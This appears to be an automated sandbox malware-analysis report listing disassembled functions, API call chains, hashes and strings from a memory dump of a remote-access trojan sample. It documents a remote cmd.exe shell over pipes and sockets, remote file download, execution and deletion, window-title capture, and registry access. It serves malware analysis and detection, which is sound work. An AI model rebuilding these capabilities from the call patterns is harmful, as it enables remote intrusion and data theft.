                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                        • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3677997916-0
                                                                                                        • Opcode ID: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                        • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                        • Opcode Fuzzy Hash: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                        • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                                        Function 0041265D Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                        • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3677997916-0
                                                                                                        • Opcode ID: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                                        • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                                                                                        • Opcode Fuzzy Hash: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                                        • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                                                                                        Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                        • RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3677997916-0
                                                                                                        • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                        • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                        • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                        • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                                        Function 0041246E Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                        • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3677997916-0
                                                                                                        • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                        • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                        • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                        • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                                        Function 00409517 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _wcslen
                                                                                                        • String ID: xAG
                                                                                                        • API String ID: 176396367-2759412365
                                                                                                        • Opcode ID: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                                                                                        • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                                                                        • Opcode Fuzzy Hash: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                                                                                        • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                                                                        Function 0041A945 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A959
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: GlobalMemoryStatus
                                                                                                        • String ID: @
                                                                                                        • API String ID: 1890195054-2766056989
                                                                                                        • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                        • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                                                                                        • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                        • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                                                                                        Function 004041F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                          • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateEventStartupsocket
                                                                                                        • String ID:
                                                                                                        • API String ID: 1953588214-0
                                                                                                        • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                        • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                        • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                        • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                        Function 0043360D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                                          • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,0041AD75,?), ref: 00437C37
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                        • String ID:
                                                                                                        • API String ID: 3476068407-0
                                                                                                        • Opcode ID: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                                                                                        • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                                                        • Opcode Fuzzy Hash: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                                                                                        • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                                                                        Function 0041AC52 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetForegroundWindow.USER32 ref: 0041AC74
                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$ForegroundText
                                                                                                        • String ID:
                                                                                                        • API String ID: 29597999-0
                                                                                                        • Opcode ID: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                        • Instruction ID: 3cf16c2a8257e52241c70e3f2477159e0ff99a2dafdd86ddfb3cfc0a4d760bbd
                                                                                                        • Opcode Fuzzy Hash: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                        • Instruction Fuzzy Hash: 56E04875A0031467EB24A765AC4EFDA766C9704715F0000B9BA19D21C3E9B4EA04CBE4
                                                                                                        Function 00413F9A Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                                          • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                          • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                          • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                          • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                          • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                          • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                          • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                          • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                        • String ID:
                                                                                                        • API String ID: 1170566393-0
                                                                                                        • Opcode ID: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                        • Instruction ID: 9c65b6197a0e8ce5e429e224625e4c370c9a1848c9e97f9a588a6d75e163472b
                                                                                                        • Opcode Fuzzy Hash: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                        • Instruction Fuzzy Hash: 4ED05B326406216FB310575D6D01FFBB5DCDFA67617150077F408D7110D6945D82C3AD
                                                                                                        Function 0044EEB5 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00448706: RtlAllocateHeap.NTDLL(00000008,0000000A,00000000,?,00446F74,00000001,00000364,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000,?), ref: 00448747
                                                                                                        • _free.LIBCMT ref: 0044EF21
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 614378929-0
                                                                                                        • Opcode ID: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                                                                        • Instruction ID: 91765bf56145836b352927287b0900a7be963fc320189fecf9c5ab0789588b10
                                                                                                        • Opcode Fuzzy Hash: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                                                                        • Instruction Fuzzy Hash: 2D01DB771043056BF321CF66984595AFBD9FB8A370F65051EE59453280EB34A806C778
                                                                                                        Function 00448706 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(00000008,0000000A,00000000,?,00446F74,00000001,00000364,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000,?), ref: 00448747
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 312c12ffde6a647d33f516a49ed2b80b9a93d0109b1a3352aa23be3e2c0072ab
                                                                                                        • Instruction ID: 09342868e9f2d6cc7f7b696f5049c05c0568eaa44df27644d65b9450949fa691
                                                                                                        • Opcode Fuzzy Hash: 312c12ffde6a647d33f516a49ed2b80b9a93d0109b1a3352aa23be3e2c0072ab
                                                                                                        • Instruction Fuzzy Hash: 9CF0E93250412467BB216A369D55B5F7748AF427B0B34802BFC08EA691DF68DD4182ED
                                                                                                        Function 00446AFF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                                        • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                                        • Opcode Fuzzy Hash: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                                        • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                                        Function 00404262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Startup
                                                                                                        • String ID:
                                                                                                        • API String ID: 724789610-0
                                                                                                        • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                        • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                        • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                        • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                        Function 0042610E Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: send
                                                                                                        • String ID:
                                                                                                        • API String ID: 2809346765-0
                                                                                                        • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                        • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                        • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                        • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36

                                                                                                        Non-executed Functions

                                                                                                        Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                          • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                          • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                          • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                          • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                          • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                          • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                          • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                          • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                          • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                          • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                          • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                          • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                          • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                          • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                        • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                          • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                        • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                        • API String ID: 2918587301-599666313
                                                                                                        • Opcode ID: 344c2c21b75ecb46dd144ab5081a25dcbad84b09641d28bfae076c5d202fcd54
                                                                                                        • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                                        • Opcode Fuzzy Hash: 344c2c21b75ecb46dd144ab5081a25dcbad84b09641d28bfae076c5d202fcd54
                                                                                                        • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                                        Function 00405042 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 280pipesleepfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                          • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                          • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                        • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                                        • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                          • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                          • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                          • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                        • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                        • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                        • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                        • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                        • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                        • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                                        • API String ID: 3815868655-81343324
                                                                                                        • Opcode ID: 5a5e837b1a5c73d244bdc50f52d0c0277f8ea75593c2154cdaf09b4041bb4b09
                                                                                                        • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                                        • Opcode Fuzzy Hash: 5a5e837b1a5c73d244bdc50f52d0c0277f8ea75593c2154cdaf09b4041bb4b09
                                                                                                        • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                                        Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                          • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                          • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                          • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
